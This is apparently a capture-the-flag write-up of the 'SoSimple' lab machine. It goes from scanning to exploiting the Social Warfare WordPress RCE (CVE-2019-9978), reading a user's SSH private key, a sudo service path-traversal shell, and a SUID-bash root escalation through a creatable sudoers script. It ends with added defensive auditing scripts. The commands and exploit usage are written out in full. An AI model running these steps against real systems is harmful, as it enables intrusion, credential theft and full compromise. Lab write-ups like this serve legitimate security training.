Key points
- WordPress plugin RCE vulnerability
- sudo -l + shell script hijacking
Steps
As usual we start with nmap. Only ports 22 and 80 are open, and port 80 serves nothing but a single image.
Nmap scan report for 192.168.214.78
Host is up (0.46s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 5b:55:43:ef:af:d0:3d:0e:63:20:7a:f4:ac:41:6a:45 (RSA)
| 256 53:f5:23:1b:e9:aa:8f:41:e2:18:c6:05:50:07:d8:d4 (ECDSA)
|_ 256 55:b7:7b:7e:0b:f5:4d:1b:df:c3:5d:a1:d7:68:a9:6b (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: So Simple
Directory brute-forcing port 80 reveals a WordPress path.
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.214.78
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/SecLists/Discovery/Web-Content/big.txt
[+] Negative Status codes: 502,404,429,503,400
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htaccess (Status: 403) [Size: 279]
/.htpasswd (Status: 403) [Size: 279]
/server-status (Status: 403) [Size: 279]
/wordpress (Status: 301) [Size: 320] [--> http://192.168.214.78/wordpress/]
Progress: 20476 / 20477 (100.00%)
===============================================================
Finished
===============================================================
So we scan it with wpscan. I am going through a proxy here, and I want the more aggressive plugin detection, so the command is:
wpscan --api-token xxxxxx --proxy socks5://127.0.0.1:7890 -e --plugins-detection aggressive --url http://192.168.214.78/wordpress
......
......
[+] social-warfare
| Location: http://192.168.214.78/wordpress/wp-content/plugins/social-warfare/
| Last Updated: 2024-09-17T20:18:00.000Z
| Readme: http://192.168.214.78/wordpress/wp-content/plugins/social-warfare/readme.txt
| [!] The version is out of date, the latest version is 4.5.4
| [!] Directory listing is enabled
|
| Found By: Known Locations (Aggressive Detection)
| - http://192.168.214.78/wordpress/wp-content/plugins/social-warfare/, status: 200
|
| [!] 7 vulnerabilities identified:
|
|......
|......
|......
|
| [!] Title: Social Warfare <= 3.5.2 - Unauthenticated Remote Code Execution (RCE)
| Fixed in: 3.5.3
| References:
| - https://wpscan.com/vulnerability/7b412469-cc03-4899-b397-38580ced5618
| - https://www.webarxsecurity.com/social-warfare-vulnerability/
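wpscan's "out of date" finding comes from the plugin's public readme.txt (the "Stable tag:" line), which the aggressive detection above found by requesting the known plugin location. The following is an added example, not part of the original writeup or of wpscan, that reproduces this check by hand and compares the tag against the fixed version reported for the RCE (3.5.3). The readme contents and the FIXED_IN value are constructed for the demo; against a live target you would pipe the readme in with curl as shown in the comment.

```sh
#!/bin/sh
# Added example (not from the original writeup or from wpscan).
# Live use:
#   curl -s http://TARGET/wordpress/wp-content/plugins/social-warfare/readme.txt | stable_tag
# Below, the readme texts are constructed inline so the script runs offline.

# stable_tag: print the "Stable tag:" value from readme text on stdin (empty if absent)
stable_tag() {
    sed -n 's/^[Ss]table [Tt]ag:[[:space:]]*\([^[:space:]]*\).*/\1/p' | head -n 1
}

# version_lt A B: succeed if A sorts strictly before B as a version string
# (sort -V compares numerically per component, so 3.5.10 > 3.5.3)
version_lt() {
    [ "$1" != "$2" ] && [ "$(printf '%s\n%s\n' "$1" "$2" | sort -V | head -n 1)" = "$1" ]
}

# plugin_status README_TEXT FIXED_VERSION -> prints vulnerable | patched | unknown
# "unknown" covers a missing tag or "Stable tag: trunk", which cannot be compared
plugin_status() {
    tag=$(printf '%s\n' "$1" | stable_tag)
    case "$tag" in
        ""|trunk) echo "unknown"; return 0 ;;
    esac
    if version_lt "$tag" "$2"; then echo "vulnerable"; else echo "patched"; fi
}

# Constructed sample readmes (not captured from the target)
VULN_README='=== Social Warfare ===
Contributors: example
Requires at least: 4.5
Stable tag: 3.5.2
License: GPLv2'

PATCHED_README='=== Social Warfare ===
Stable tag: 4.5.4'

TRUNK_README='=== Some Plugin ===
Stable tag: trunk'

# Fixed-in version from the wpscan advisory for the RCE
FIXED_IN=3.5.3

printf 'sample 1: %s\n' "$(plugin_status "$VULN_README" "$FIXED_IN")"    # vulnerable
printf 'sample 2: %s\n' "$(plugin_status "$PATCHED_README" "$FIXED_IN")" # patched
printf 'sample 3: %s\n' "$(plugin_status "$TRUNK_README" "$FIXED_IN")"   # unknown
```

The "unknown" branch matters in practice: plugins whose readme says "trunk", or that ship no readme, cannot be fingerprinted this way, which is why wpscan falls back to other detection methods for them.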
The installed Social Warfare version has an RCE vulnerability (CVE-2019-9978), so a quick search turns up several PoCs. The one below works well: GitHub - grimlockx/CVE-2019-9978: Remote Code Execution in Social Warfare Plugin before 3.5.3 for Wordpress.
C:\home\kali\Documents\OFFSEC\play\SoSimple\CVE-2019-9978-main> python CVE-2019-9978.py -t http://192.168.214.78/wordpress -l 192.168.45.241 -p 80 -c "id"
[+] Started HTTP server on port 80
[+] Payload created successfully
[+] Target seems vulnerable
[+] Exploiting...
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Using the same PoC to run commands, we find a key file under /home/max/.ssh, so we copy it out and try to log in over SSH with it.
C:\home\kali\Documents\OFFSEC\play\SoSimple\CVE-2019-9978-main> python CVE-2019-9978.py -t http://192.168.214.78/wordpress -l 192.168.45.241 -p 80 -c "cat /home/max/.ssh/id_rsa"
[+] Started HTTP server on port 80
[+] Payload created successfully
[+] Target seems vulnerable
[+] Exploiting...
-----BEGIN OPENSSH PRIVATE KEY-----
......
-----END OPENSSH PRIVATE KEY-----
Write the key above into a local id_rsa, set its permissions to 600, and the SSH login succeeds.
C:\home\kali\Documents\OFFSEC\play\SoSimple> chmod 600 id_rsa
C:\home\kali\Documents\OFFSEC\play\SoSimple> ssh max@192.168.214.78 -i id_rsa
Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-40-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
......
......
max@so-simple:~$ whoami
max
Running sudo -l first shows that max can run /usr/sbin/service as steven.
max@so-simple:~$ sudo -l
Matching Defaults entries for max on so-simple:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User max may run the following commands on so-simple:
(steven) NOPASSWD: /usr/sbin/service
Following the GTFOBins entry for service, we can get a shell as steven: service executes the script name it is given relative to /etc/init.d, so ../../bin/bash walks out of that directory and runs /bin/bash as the target user.
max@so-simple:~$ sudo -u steven /usr/sbin/service ../../bin/bash
steven@so-simple:/$ id
uid=1001(steven) gid=1001(steven) groups=1001(steven)
Running sudo -l again as steven shows that steven can run /opt/tools/server-health.sh as root.
steven@so-simple:/$ sudo -l
Matching Defaults entries for steven on so-simple:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User steven may run the following commands on so-simple:
(root) NOPASSWD: /opt/tools/server-health.sh
But that file does not actually exist, and neither does /opt/tools. Because /opt turns out to be writable by steven (the mkdir below succeeds), we can create the directory and the script ourselves, have it set the SUID bit on /bin/bash, run it as root through sudo, and the privilege escalation succeeds. A sudoers rule pointing at a path that is missing or sits under a directory the user can write to is as good as a rule for an arbitrary command.
steven@so-simple:/$ cat /opt/tools/server-health.sh
cat: /opt/tools/server-health.sh: No such file or directory
steven@so-simple:/$ ls -l /opt/tools
ls: cannot access '/opt/tools': No such file or directory
steven@so-simple:/$ ls -l /opt
total 0
steven@so-simple:/$ mkdir /opt/tools
steven@so-simple:/$ cd /opt/tools
steven@so-simple:/opt/tools$
steven@so-simple:/opt/tools$ echo "chmod +s /bin/bash" > server-health.sh
steven@so-simple:/opt/tools$ chmod +x server-health.sh
steven@so-simple:/opt/tools$ sudo -u root /opt/tools/server-health.sh
steven@so-simple:/opt/tools$ ls -l /bin/bash
-rwsr-sr-x 1 root root 1183448 Feb 25 2020 /bin/bash
steven@so-simple:/opt/tools$ /bin/bash -p
bash-5.0# cat /root/proof.txt
5d53bb7f654bb7d09e8fbfa50a392267
bash-5.0#
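The last step worked because a sudo rule's target was missing and its parent directory could be created. The following is an added example, not part of the original writeup, that automates that check: it pulls the command paths out of sudo -l output and classifies each as exploitable by creation, exploitable by modification, or safe. The sudo -l text and the directory tree it is run against are constructed for the demo (a temporary directory standing in for /), not captured from the target.

```sh
#!/bin/sh
# Added example (not from the original writeup). Checks every command in
# "sudo -l" output for the weakness abused above: a target that does not exist
# but can be created, or that exists and is writable by the current user.

# sudo_targets: read "sudo -l" output on stdin, print one command path per line
# matches lines like "    (root) NOPASSWD: /opt/tools/server-health.sh"
sudo_targets() {
    sed -n 's/^[[:space:]]*([^)]*)[[:space:]]*\(NOPASSWD:[[:space:]]*\)\{0,1\}\(\/[^[:space:],]*\).*/\2/p'
}

# check_sudo_target PATH -> prints one of:
#   writable           target exists and we can modify it
#   missing-creatable  target missing and its nearest existing ancestor is writable
#   missing-protected  target missing and it cannot be created
#   ok                 target exists and is not writable by us
# Note: as root every path tests writable, so run this as the low-privileged user.
check_sudo_target() {
    target=$1
    if [ -e "$target" ]; then
        if [ -w "$target" ]; then echo writable; else echo ok; fi
        return 0
    fi
    # walk up until we hit a directory that exists, then test whether we can write there
    dir=$(dirname "$target")
    while [ ! -e "$dir" ]; do
        dir=$(dirname "$dir")
    done
    if [ -w "$dir" ]; then echo missing-creatable; else echo missing-protected; fi
}

# audit_sudo ROOTDIR: classify every target in SUDO_L_SAMPLE, resolving paths under ROOTDIR
# (ROOTDIR is "" on a real host; here it is a scratch tree)
audit_sudo() {
    printf '%s\n' "$SUDO_L_SAMPLE" | sudo_targets | while IFS= read -r path; do
        printf '%s %s\n' "$path" "$(check_sudo_target "$1$path")"
    done
}

# Constructed sudo -l output, same shape as the writeup's
SUDO_L_SAMPLE='Matching Defaults entries for steven on so-simple:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin

User steven may run the following commands on so-simple:
    (root) NOPASSWD: /opt/tools/server-health.sh
    (steven) NOPASSWD: /usr/sbin/service'

# Throwaway tree: /opt exists and is writable, /opt/tools does not,
# /usr/sbin/service exists with mode 555 (reports "ok" for a non-root user).
DEMO_ROOT=$(mktemp -d)
mkdir -p "$DEMO_ROOT/opt" "$DEMO_ROOT/usr/sbin"
printf '#!/bin/sh\n' > "$DEMO_ROOT/usr/sbin/service"
chmod 555 "$DEMO_ROOT/usr/sbin/service"

audit_sudo "$DEMO_ROOT"
# first line: /opt/tools/server-health.sh missing-creatable
```

On a real host call audit_sudo with an empty root and feed it the actual sudo -l output; a "missing-creatable" or "writable" result is the same finding that gave root here, and the fix on the defender's side is to make sure every path in sudoers exists, is owned by root, and has no writable ancestor.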